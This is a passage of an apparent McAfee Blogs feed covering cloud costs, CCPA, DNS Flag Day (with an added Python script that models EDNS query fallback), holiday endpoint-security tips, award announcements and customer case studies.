How should you approach finding and fixing the root causes of cloud performance issues? Check your infrastructure and the applications themselves. Examine the applications you ported over from on-premises data centers, and evaluate whether newer cloud technologies such as containers or serverless computing could replace some of your application components and improve performance. Also, evaluate multiple cloud providers for your application or infrastructure needs, as each has its own offerings and geographic distribution.

Cloud Management Challenge #5: Cost

Managing cloud costs can be a challenge, but in general, migrating to the cloud offers companies enormous savings. We see organizations investing more dollars in the cloud to bring greater flexibility to their enterprise, allowing them to quickly and efficiently react to the changing market conditions. Organizations are moving more of their services to the cloud, which is resulting in higher spend with cloud service providers.

Shifting IT cost from on-premises to the cloud on its own is not the challenge – it is the unmonitored sprawl of cloud resources that typically spikes cost for organizations. Managing your cloud costs can be simple if you effectively monitor use. With visibility into unsanctioned, “Shadow” cloud use, your organization can find the areas where there is unnecessary waste of resources. By auditing your cloud usage, you may even determine new ways to manage cost, such as re-architecting your workloads using a PaaS architecture, which may be more cost-effective.

Final Thoughts

Migrating to the cloud is a challenge but can bring a wide range of benefits to your organization with a reduction in costs, unlimited scalability, improved security, and overall a faster business model. These days, everyone is in the cloud but that doesn’t mean your business’s success should be hindered by the common challenges of cloud management.

For more on how to secure your cloud environment, check out McAfee MVISION Cloud, a cloud access security broker (CASB) that protects data where it lives with a solution that was built natively in the cloud, for the cloud.

 

The post Cloud 101: Navigating the Top 5 Cloud Management Challenges appeared first on McAfee Blogs.

ST04: Ransomware Trends with Raj Samani and John Fokker https://securingtomorrow.mcafee.com/other-blogs/podcast/st04-ransomware-trends-with-raj-samani-and-john-fokker/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st04-ransomware-trends-with-raj-samani-and-john-fokker/#respond Tue, 23 Apr 2019 22:54:20 +0000 https://securingtomorrow.mcafee.com/?p=94993

Raj Samani, Chief Scientist and McAfee Fellow, and John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research, discuss various ransomware attacks and how ransomware is evolving.

The post ST04: Ransomware Trends with Raj Samani and John Fokker appeared first on McAfee Blogs.

ST02: Mobile World Congress 2019 Recap with Gary Davis https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/st02-mobile-world-congress-2019-recap-with-gary-davis-2/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/st02-mobile-world-congress-2019-recap-with-gary-davis-2/#respond Wed, 13 Mar 2019 16:49:41 +0000 https://securingtomorrow.mcafee.com/?p=94595

Our Chief Consumer Evangelist, Gary Davis, joins us in discussing the recent Mobile World Congress 2019 on his and McAfee’s views ranging from trending themes from the show to McAfee key announcements and goals.

The post ST02: Mobile World Congress 2019 Recap with Gary Davis appeared first on McAfee Blogs.

ST02: Mobile World Congress 2019 Recap with Gary Davis https://securingtomorrow.mcafee.com/other-blogs/podcast/st02-mobile-world-congress-2019-recap-with-gary-davis/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st02-mobile-world-congress-2019-recap-with-gary-davis/#respond Mon, 11 Mar 2019 17:46:59 +0000 https://securingtomorrow.mcafee.com/?p=94538

Our Chief Consumer Evangelist, Gary Davis, joins us in discussing the recent Mobile World Congress 2019 on his and McAfee’s views ranging from trending themes from the show to McAfee key announcements and goals.

The post ST02: Mobile World Congress 2019 Recap with Gary Davis appeared first on McAfee Blogs.

Kicking off 2019 with Recognition Across the McAfee Portfolio https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/ https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/#respond Tue, 12 Feb 2019 14:00:01 +0000 https://securingtomorrow.mcafee.com/?p=94143


It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude of technologies. Excellence that we believe is validated by our larger peer and analyst community.

We’ve just announced that McAfee was named a Gartner Peer Insights Customers’ Choice for another two technologies. Our customers have recognized us as a January 2019 Gartner Peer Insights Customers’ Choice for Secure Web Gateway for McAfee Web Protection, McAfee Web Gateway, and McAfee Web Gateway Cloud Service. In addition, for the second year in a row, McAfee’s MVISION Cloud (formerly McAfee Skyhigh Security Cloud) was named a January 2019 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In 2018, McAfee was the only vendor named a Customers’ Choice in the Cloud Access Security Brokers market.

Our team at McAfee takes great pride in these distinctions, as customer feedback is essential in shaping our products and services. We put our customers at the core of everything we do, and this shows pervasively across our portfolio. We believe our position as a Gartner Peer Insights Customers’ Choice for Secure Web Gateway, Data Loss Prevention, SIEM, Endpoint Protection and Cloud Access Security Broker (CASB) is a testament to the strength of our device-to-cloud strategy. This adds up to recognition in the last year in five different markets.

We also think it’s a signal of the way enterprises are approaching security – with the innovative technology solutions and integrated strategies that must evolve to fight a threat that is constantly evolving, too.

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/ https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/#respond Tue, 05 Feb 2019 15:00:38 +0000 https://securingtomorrow.mcafee.com/?p=93996


Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared.

“Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to new ways of serving up information to customers,” says Butler, whose firm provides a full range of cybersecurity services, from one-time red team engagements to managing security operations, primarily for midsize enterprises. “It’s exciting what technology can do to transform what we do with computers. … We’re seeing a huge uptake in collaboration technology, with a lot of customers moving to AWS [Amazon Web Services].”

But Butler acknowledges his clients’ fears—putting sensitive data in the cloud introduces new risks. “Our job is to help customers leverage digital transformation positively without having to worry about the risks, [such as] breaches and brand reputation damage,” he says. “We’ve had to focus on how we protect them in [the cloud and] those areas of their business—areas that have traditionally been quite dark.”

The Challenge of Securing the Cloud

“Setting up security for the cloud can be quite technical,” Butler explains. “There are a lot of configuration options. … Yes, the cloud brings a lot of speed and scale, but one wrong configuration and suddenly you have an AWS S3 bucket available to the broader public with all of your confidential information on it. The cloud brings benefits, but it also brings new and different risks.”

Confidently Securing the Cloud with Help from McAfee

As one of the longest-running cybersecurity companies in Australia, Loop Secure has been a McAfee partner for over a decade. For its clients moving operations into the cloud, the firm primarily uses McAfee solutions to help them reach their security objectives—easily and effectively. For instance, for a midsize services client, Loop Secure implemented McAfee® Virtual Network Security Platform (McAfee vNSP), a complete network threat and intrusion prevention system (IPS) built for the unique demands of private and public clouds. Using McAfee vNSP allowed the company to apply the same robust security policies to endpoints within AWS as on premises.

“What McAfee brings to the table is a comprehensive portfolio, scale, and focus,” Butler explains. “Like us, McAfee focuses only on cybersecurity. That’s important. … To us, the McAfee ‘Together is Power’ mantra means that with McAfee we have a broader team—our people plus McAfee people and products—all dedicated to keeping our clients’ data and environments safe.”

Many of Butler’s clients use McAfee endpoint, networking, and/or web protection solutions and McAfee ePolicy Orchestrator® (McAfee ePO™). In the near future, Butler looks forward to offering them McAfee MVISION, an innovative, integrated, open system from device to cloud. McAfee MVISION could simplify security for these Loop Secure customers by providing consolidated visibility, comprehension, and control across their entire digital estate.

With the acceleration of cloud adoption by its clients and McAfee’s device-to-cloud approach, “The future’s pretty exciting for both us and McAfee,” Butler says.

View below for a short video interview with Patrick Butler. Get your questions answered by tweeting @McAfee_Business.

The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

California Consumer Privacy Act https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/ https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/#respond Mon, 04 Feb 2019 14:00:17 +0000 https://securingtomorrow.mcafee.com/?p=93964


This blog was written by Gerald Jones Jr.

More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights.

Shortly after the European Union’s watershed General Data Protection Regulation (GDPR) enforcement began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of 2018 (CCPA), in June. Amid pressure to act or swallow a more stringent bill initiated by a private California resident, the CCPA broadens the scope of privacy rights for Californians. It includes data access rights and a limited private right of action, or the right to file a lawsuit.

The CCPA takes effect in January 2020 (or July 2020, if the California Attorney General implements additional regulations) and is widely regarded as the foremost privacy law in the United States. Yet the CCPA may have broader implications. The range of companies falling within the Act’s scope, i.e., not just the usual suspects in the technology industry, might pressure Congress into enacting a federal privacy regime, which would pre-empt the CCPA.

The Act grants consumers greater control over their personally identifiable information and prods companies doing business in the state to prioritize the practice of sound data governance. Here are some key takeaways under the CCPA:

  • It impacts companies doing business in California that meet one of the following thresholds:
    • Has annual gross revenues greater than $25 million; or
    • Receives or shares the personal information of 50,000 or more California consumers for monetary or other valuable consideration; or
    • Receives 50% or more of its annual revenue from selling consumer personal information.
  • “Personal Information” now explicitly includes IP addresses, geolocation data, and unique identifiers such as cookies, beacons, pixel tags, browsing history, and other electronic network information. “Consumer Information” includes information that relates to households.
  • The California Attorney General will enforce the law, though Californians have a private right of action limited to circumstances where there is an unauthorized access to nonencrypted personal information or “disclosure of personal information because of a business failure to implement and maintain reasonable security procedures.”
  • Violators of the law are subject to civil penalties of up to $2,500 for each unintentional violation—failing to cure a violation within 30 days of receiving a noncompliance notification from the California Attorney General—and a maximum of $7,500 for each intentional violation (not acknowledging a request for data, for example) if the civil action is brought by the California Attorney General.

What Does This All Mean?

Regulators are working on guidance, and there is still time for amendments to be made on the law, so things might change before the law goes into effect. Residents of the European Economic Area have been exercising their data subject access rights since late May. Now, Californians will join them in being able to similarly ask about the data that CCPA-applicable companies hold about them. The CCPA gives companies a 45-day window to comply with an individual’s request for access to data or deletion (a Data Subject Access Request, or DSAR) in contrast to the GDPR’s 30 days.

Companies may need to prepare for an increase in DSARs and implement new features to comply with the law, such as offering two communication methods for consumers electing to exercise their rights (a web portal, email address, toll-free telephone number, or another viable mode of communication) and providing a conspicuous link on the company’s website that informs consumers of their CCPA rights.

The California Legislature’s reference to Cambridge Analytica makes it apparent that legislators expect businesses to exercise transparency in their consumer data use practices. Even without legislative nudging, companies are slowly recognizing value in sound privacy and data governance practices. Companies no longer see privacy as a mere compliance checkbox, but instead as a competitive advantage that simultaneously builds consumer confidence.

We may see more changes to the California law, and we likely will see other laws come into play both in the United States and abroad (Brazil, China, India, etc.), but companies with privacy in their DNA will have an edge over companies scrambling to meet compliance requirements.

The post California Consumer Privacy Act appeared first on McAfee Blogs.

What You Need to Know About DNS Flag Day https://securingtomorrow.mcafee.com/business/what-you-need-to-know-about-dns-flag-day/ Thu, 31 Jan 2019 17:37:02 +0000 https://securingtomorrow.mcafee.com/?p=94009


This blog was written by Michael Schneider, Lead Product Manager.

The internet is built on Postel’s law, often referred to as the robustness principle: “Be conservative in what you do, be liberal in what you accept from others.” In the protocol world, this means that receivers will try to accept and interpret the data they receive to the best of their knowledge and will be flexible if the data doesn’t fully match a specification. Senders, in turn, should adhere to the protocol specifications as laid out in Request for Comments documents (RFCs) by the Internet Engineering Task Force.

DNS was released as RFC 1035 in 1987 and was superseded by EDNS in 1999 with RFCs 2671 and 6891. EDNS, or extension mechanisms for DNS, aimed to flexibly deploy new features into the DNS protocol, including protection against DNS flooding attacks amongst other performance and security enhancements. These attacks can cause a major outage for cloud-based infrastructure, which happened in 2016 with the DDoS attack on DNS provider Dyn.

To avoid such attacks and improve DNS efficiency, several DNS software and service providers—like Google, Cisco, and Cloudflare—have agreed to “coordinate removing accommodations for non-compliant DNS implementations from their software or service,” beginning Feb. 1, 2019, or DNS Flag Day.

Before DNS Flag Day, if an EDNS server requested a name resolution from a non-EDNS resolver, it would first send an EDNS query. If there was no response, the server would then send a legacy DNS query. That means that the timeout for the first query would need to be reached before the legacy DNS query was sent, generating a delayed response. These delays ultimately make DNS operations less efficient.

But with the new changes introduced for DNS Flag Day, any DNS server that doesn’t respond to EDNS will be seen as “dead,” and no additional DNS query will be sent to that server. The result? Certain domains or offerings may no longer be available, as name resolution will fail. Organizations should plan to provide a bridge between their internal DNS and a provider’s DNS to ensure that the EDNS protocol is used. They should also work with their vendors to verify that EDNS is part of DNS communication and obtain a version of the respective product that complies with the requirements of EDNS.
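As an added example (not code from the original post), the following Python models the resolver behaviour described above: it builds a query with and without the EDNS0 OPT record, classifies a server’s answer, and contrasts the pre-Flag-Day fallback with the post-Flag-Day “dead server” rule. The fake_server() responses, the 1232-byte buffer size and the example.com name are constructed assumptions; udp_sender() is the only part that reaches a real server.

```python
"""EDNS fallback model for the DNS Flag Day post (example code, not McAfee's)."""
import socket
import struct
from typing import Callable, Optional

OPT_TYPE = 41          # EDNS0 OPT pseudo-RR type (RFC 6891)
EDNS_UDP_SIZE = 1232   # UDP payload size advertised in OPT (assumed, conservative)
SOA = 6

Sender = Callable[[bytes], Optional[bytes]]


def build_query(qname: str, qtype: int = SOA, txid: int = 0x1234, edns: bool = True) -> bytes:
    """Return a wire-format DNS query; with edns=True an OPT record is appended."""
    # Header: id, flags (RD set), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=1 if OPT present
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1 if edns else 0)
    labels = qname.rstrip(".").split(".")
    question = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    question += struct.pack("!HH", qtype, 1)  # QTYPE, QCLASS=IN
    if not edns:
        return header + question
    # OPT: root name, TYPE=41, CLASS=UDP size, TTL=ext-RCODE/version/flags, RDLEN=0
    opt = b"\x00" + struct.pack("!HHIH", OPT_TYPE, EDNS_UDP_SIZE, 0, 0)
    return header + question + opt


def _skip_name(data: bytes, off: int) -> int:
    """Advance past a (possibly compressed) domain name, returning the new offset."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer occupies two bytes
            return off + 2
        off += 1 + length


def classify_response(txid: int, resp: Optional[bytes]) -> str:
    """Classify an answer: 'edns', 'no-edns', 'timeout', 'bad-id' or 'malformed'."""
    if resp is None:
        return "timeout"
    try:
        rid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", resp[:12])
        if rid != txid:
            return "bad-id"
        off = 12
        for _ in range(qd):  # skip echoed question(s)
            off = _skip_name(resp, off) + 4
        for _ in range(an + ns + ar):  # walk every RR looking for OPT
            off = _skip_name(resp, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
            if rtype == OPT_TYPE:
                return "edns"
            off += 10 + rdlen
    except (IndexError, struct.error):
        return "malformed"
    return "no-edns"


def probe(qname: str, sender: Sender, flag_day: bool = True) -> str:
    """Emulate the resolver: EDNS query first; before Flag Day fall back to a legacy
    query on timeout, after Flag Day treat a silent server as dead."""
    txid = 0x2A2A
    verdict = classify_response(txid, sender(build_query(qname, txid=txid, edns=True)))
    if verdict != "timeout":
        return verdict
    if flag_day:
        return "dead"
    legacy = classify_response(txid, sender(build_query(qname, txid=txid, edns=False)))
    return "legacy-fallback" if legacy in ("edns", "no-edns") else "dead"


def udp_sender(server: str, timeout: float = 2.0) -> Sender:
    """Real transport: one UDP query to server:53, answer bytes or None on timeout."""
    def sender(packet: bytes) -> Optional[bytes]:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(timeout)
            s.sendto(packet, (server, 53))
            try:
                return s.recv(4096)
            except socket.timeout:
                return None
    return sender


def fake_server(mode: str) -> Sender:
    """Constructed stand-in for a name server. Modes: 'compliant' (answers with OPT),
    'ignores-edns' (answers without OPT), 'drops-edns' (never answers an OPT query)."""
    def sender(packet: bytes) -> Optional[bytes]:
        txid, _flags, _qd, _an, _ns, ar = struct.unpack("!HHHHHH", packet[:12])
        if mode == "drops-edns" and ar:
            return None  # the timeout case the post describes
        question = packet[12:_skip_name(packet, 12) + 4]
        with_opt = mode == "compliant"
        resp = struct.pack("!HHHHHH", txid, 0x8180, 1, 0, 0, 1 if with_opt else 0) + question
        if with_opt:
            resp += b"\x00" + struct.pack("!HHIH", OPT_TYPE, 4096, 0, 0)
        return resp
    return sender


if __name__ == "__main__":
    for mode in ("compliant", "ignores-edns", "drops-edns"):
        before = probe("example.com", fake_server(mode), flag_day=False)
        after = probe("example.com", fake_server(mode), flag_day=True)
        print(f"{mode:13s} before Flag Day: {before:16s} after Flag Day: {after}")
```

Replacing fake_server(...) with udp_sender("<your authoritative server IP>") runs the same EDNS-first probe against a real server; a result of "dead" is the failure mode the post warns about.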

The DNS Flag Day changes are a disruptive move, as they break from Postel’s law—servers can no longer expect every query to be accommodated. But as with most internet-related innovations, progress requires a little disruption.

The post What You Need to Know About DNS Flag Day appeared first on McAfee Blogs.

McAfee 2018: Year in Review https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/ https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/#respond Fri, 28 Dec 2018 18:37:54 +0000 https://securingtomorrow.mcafee.com/?p=93538


2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION® Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

Giving Your Endpoint the Gift of Security This Holiday Season https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/ https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/#respond Tue, 18 Dec 2018 14:00:18 +0000 https://securingtomorrow.mcafee.com/?p=93238


Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer, it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive fun to find vulnerabilities and infect unsecured devices. And with many employees out of office, these hackers could potentially pose a serious threat to an organization’s endpoints, and thereby its network. As a matter of fact, there are a few key reasons as to why your organization’s endpoints may be in danger during the holidays. Let’s take a look.

Business Shutdowns

Most companies close down for a handful of days during the holidays, if not a full week or two. That means fewer people manning the IT station, executing updates, and defending the network if cybercriminals manage to find a way inside. A lack of personnel could be just the opportunity cybercriminals need to take advantage of an open entry point and swoop data from an organization essentially undetected.

Holiday Spirit, Relaxed Attitude

For the employees that do stay online during the holidays, attitudes can range from relaxed to inattentive. Unless their product or service directly relates to the holidays and shopping, businesses tend to be quiet during this time. And with many coworkers out, employees tend to have less reason to be glued to their computer all the time. This could mean cyberattacks or necessary security actions go unattended – irregular activity may not seem as obvious or a necessary software update could go unresolved a little too long. What’s more – the lax attitude could potentially lead to a successful phishing attack. In fact, phishing scams are said to ramp up starting in October, as these cybercriminals are eager to time their tricks with the holiday season. In order to accurately identify a phishing scheme, users have to be aware and have their eyes on their inbox at all times. One false move could potentially expose the entire organization, creating a huge problem for the reduced staff on hand.

Holiday Travel = Public Wi-Fi

Workplace mobility is a great new aspect of the modern age – it permits employees more flexibility and allows them to work from essentially anywhere in the world. But if employees are working out of a public space – such as a coffee shop or an airport – they are likely using public Wi-Fi, which is one of the most common attack vectors for cybercriminals today. That’s because there are flaws in the encryption standards that secure Wi-Fi networks and cybercriminals can leverage these to hack into a network and intercept or infect users’ traffic. If an employee is traveling home for the holidays and using public Wi-Fi to get work done while they do, they could potentially expose any private company information that lies within their device.

BYOD in Full Force

Speaking of modern workplace policies, Bring Your Own Device (or BYOD) – a program that allows employees to bring their own personal devices into work – is a common phenomenon these days. With this program, employees’ personal devices connect to the business’ network to work and likely access company data.

That means there is crucial data living on these personal devices, which could be jeopardized when the devices travel outside of the organization. With the holidays, these devices are likely accompanying the employees on their way to visit family, which means they could be left at an airport or hotel. Beyond that, these employees are more likely to access emails and company data through these mobile devices while they are out of the office. And with more connected devices doing company business, there are simply more chances for device and/or data theft.

Staying Secure While Staying Festive

Now, no one wants their employees to be online all the time during the holidays. Fortunately, there are actions organizations can take to ensure their employees and their network are merry and bright, as well as secure. First and foremost, conduct some necessary security training. Put every employee through security training courses so they’re aware of the risks of public Wi-Fi and are reminded to be extra vigilant of phishing emails during this time. Then, make sure all holes are patched and every update has been made before everyone turns their attention to yuletide festivities. Lastly, if an employee is working remotely – remind them to always use a VPN.

No matter who’s in the office and who’s not, it’s important to have always-on security that is armed for the latest zero-day exploits – like McAfee Endpoint Security. You can’t prevent every user from connecting to a public network or one that is set up for phishing, but you can ensure they have an active defense that takes automatic corrective actions. That way, employees can enjoy the time off and return to a safe and secure enterprise come the new year.

To learn more about endpoint security and McAfee’s strategies for it, be sure to follow us at @McAfee and @McAfee_Business.


The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/ https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/#respond Thu, 13 Dec 2018 21:28:59 +0000 https://securingtomorrow.mcafee.com/?p=93095


The Cyber Security Gurukul Series is an initiative of ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for women professionals in core technologies by noted industry body NASSCOM. Focused specifically on IT-ITES/BPM, product and R&D firms, the key aim of this initiative is to give women deeper knowledge of various technologies and thereby nurture them as leaders for tomorrow. It is an initiative McAfee is proud to partake in, which is why on December 4th, McAfee India hosted close to 40 female professionals from many organizations, including McAfee, as a part of NASSCOM’s Cybersecurity Gurukul series.

The half-day session started with a keynote from Venkat Krishnapur, VP Engineering & Managing Director, McAfee India. Addressing the group on “Countering Emerging Threats by Building Security DNA of your Organization”, the session discussed how the exponential growth of connected devices over the past few years has made organizations and individuals more prone to cyberattacks than ever before. Venkat also covered other key topics, such as the increase in the number of cyberattacks, the variety and evolution of malware, the importance of cloud security in today’s day and age, and how security organizations such as McAfee invest in both technology and people.

Following Venkat’s keynote session, Sandeep Kumar Singh, Security Researcher and SSA Lead, McAfee India, hosted a two-hour session for the attendees. The session, “Introduction to Security Deployment Lifecycle”, touched upon why it’s imperative for organizations to invest in SDL, the key ingredients of a successful security program, and a walkthrough of key SDL activities. Sandeep also spoke to the group about how choosing a career in cybersecurity will give them a competitive edge, as a shortage of professionals in this field remains a critical vulnerability for organizations and nations alike.

Overall, the event was quite the hit with attendees, as shown by the demos, quizzes, and an interactive Q&A session. Sharing their feedback on the event, one of the participants said:

“The Cyber Security session which I attended today at McAfee India will go a long way in helping us enhance our knowledge and skills. The presentation given by Sandeep was excellent and the slides prepared by him were crisp and clear. We’d like to thank NASSCOM for arranging these sessions and we are looking for more such classroom sessions coming on our way.”

Sessions and programs such as these will go a long way in ensuring that organizations help pave the way for women to enhance their skills, as well as give them an edge in their career development. McAfee is proud to play a role in influencing the overall India/APAC digital security ecosystem through its thought leadership.

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/ https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/#respond Fri, 07 Dec 2018 17:47:10 +0000 https://securingtomorrow.mcafee.com/?p=92988


We are excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms. McAfee takes great pride in this distinction, as we feel that real-world feedback from our customers is the driving force behind the recognition and that they have spoken loudly about the value they are receiving from our products.

In its announcement, Gartner explains, “Since October 2015, more than 100,000 reviews across more than 300 markets have been posted to Gartner Peer Insights. In markets where there is enough data, Gartner Peer Insights recognizes the vendors who are the most highly rated by their customers through the Customers’ Choice distinction. This peer-rated distinction can be a useful complement to expert opinion, as it focuses on direct peer experiences of implementing and operating a solution.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors.


For this distinction, a vendor must have a minimum of 50 approved ratings with an average overall rating of 4.2 stars or higher. McAfee received 651 reviews and an average 4.4 rating out of 5 total for the Endpoint Protection Platforms market as of November 19th, 2018.

Here are some excerpts from customers that contributed to the distinction:

“This is what an Endpoint Security Solution should look like”

Cyber Security Analyst in the Government Industry

“McAfee ENS has been a complete game changer in the world [of] endpoint security.”

Infrastructure and Operations in the Retail Industry

“Seamless upgrade from legacy products to ENS, ePO is probably the best management console I’ve used for any product I’ve used”

Sr. Desktop Engineer in the Services Industry

And those are just a few. You can read more reviews for McAfee Endpoint Security on our web site and on the Gartner site.

On behalf of McAfee, I would like to thank all of our customers who took the time to share their experiences. We are delighted to be a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms and we believe that it is your valuable feedback which made it possible. To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights Customers’ Choice announcement page.


  • Gartner Peer Insights’ Customers’ Choice for Endpoint Security and Protection Software announcement November 19, 2018


The Gartner Peer Insights Customers’ Choice logo is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice distinctions constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms appeared first on McAfee Blogs.

Extending Security to the Public Cloud is the Easy Part https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/ https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/#respond Thu, 06 Dec 2018 16:00:57 +0000 https://securingtomorrow.mcafee.com/?p=92929


“The biggest challenge of securing the public cloud isn’t technical.”

That’s the opinion of an IT security analyst at a large U.S. government contractor. He should know. In the last year, his company rolled out a multi-tiered cloud environment, with instances in Amazon Web Services (AWS) as well as on premises.

For this company, which administers federal and state programs that directly assist a broad sector of the American population, leveraging the public cloud made sense. Using the cloud would reduce total cost of ownership (TCO), provide clients and end users with easier access to their information via web-based portals, and enable quickly ramping up or scaling down bandwidth requirements to support the widely fluctuating number of users across projects. However, cybersecurity was a critical concern.

Fast, easy deployment of cloud protection and highly granular policies

Before launching its first contracted project using a public cloud, the company thoroughly researched its cloud security options. Based on its research, the company decided to implement McAfee Cloud Workload Security to bolster the security of data within AWS. “With McAfee Cloud Workload Security, we can get very granular with our policies,” the systems analyst said. “It is a very powerful tool in [the cloud] environment. We are able to be very proactive in pushing out to endpoints [in the cloud] what they need.”

By bridging native AWS API-driven data sources such as GuardDuty with a cloud workload protection platform like McAfee Cloud Workload Security (CWS), tenants of AWS can use the data-rich sources of AWS within CWS to manage and secure mission-critical workloads with advanced security from a single console.

Since the company’s security team already relied on the McAfee integrated security platform and McAfee ePolicy Orchestrator (McAfee ePO) management console, deploying McAfee Cloud Workload Security was simple and took less than a week. Once the solution and its components were implemented, the company had end-to-end visibility into all cloud workloads and their underlying platforms plus insights into weak security controls, unsafe firewall and encryption settings, and indicators of compromise (IoCs).

Small IS team easily adds management of cloud protection

The company supports its 15,000 professionals and 35,000 endpoints with an information security team of only five people spread across three locations. Such a lean staff is possible primarily thanks to McAfee ePO. Adding cloud protection to the company’s security arsenal required no additional staff. The team simply extended its ability to easily set policies and monitor and manage endpoint protection from on premises into the cloud.

